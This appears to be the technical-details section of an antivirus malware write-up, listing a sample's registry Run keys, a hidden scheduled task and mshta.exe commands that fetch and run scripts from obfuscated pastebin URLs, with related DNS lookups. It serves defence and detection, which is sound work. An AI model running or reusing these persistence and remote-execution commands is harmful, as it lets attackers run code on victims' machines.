Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'sgnittes' = '"mshta""https://%40%40%40%40%40%40@pastebin.com\raw\jGJuAL6s"'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '' = '"mshta""https://%40%40%40%40%40%40@pastebin.com\raw\hBN1PyKC"'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'warfed' = '"mshta""https://%40%40%40%40%40%40@pastebin.com\raw\fsK1apdt"'
- <SYSTEM32>\tasks\xestuohtiwfyl
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- http://oc##.#tartssl.com/sub/class2/code/ca/MEMwQTA%2FMD0wOzAJBgUrDgMCGgUABBQSOgrhRCSnWfKxoWTjWxhk8hga9AQU0E4PQJlsuEsZbzsouODjiAc0qrcCAhAV
- DNS ASK pa###bin.com
- DNS ASK microsoft.com
- DNS ASK oc##.#tartssl.com
- '<SYSTEM32>\schtasks.exe' /create /sc MINUTE /mo 70 /tn "xestuohtiwfyl" /F /tr "\"mshta\"https://%20%20@pastebin.com\raw\D7KH4EKV' (со скрытым окном)
- '<SYSTEM32>\mshta.exe' https://%40%40%40%40%40%40@pastebin.com\raw\D7KH4EKV
- '<SYSTEM32>\schtasks.exe' /create /sc MINUTE /mo 70 /tn "xestuohtiwfyl" /F /tr "\"mshta\"https://%20%20@pastebin.com\raw\D7KH4EKV
- '<SYSTEM32>\mshta.exe' https://%40%40%40%40%40%40@pastebin.com\raw\fsK1apdt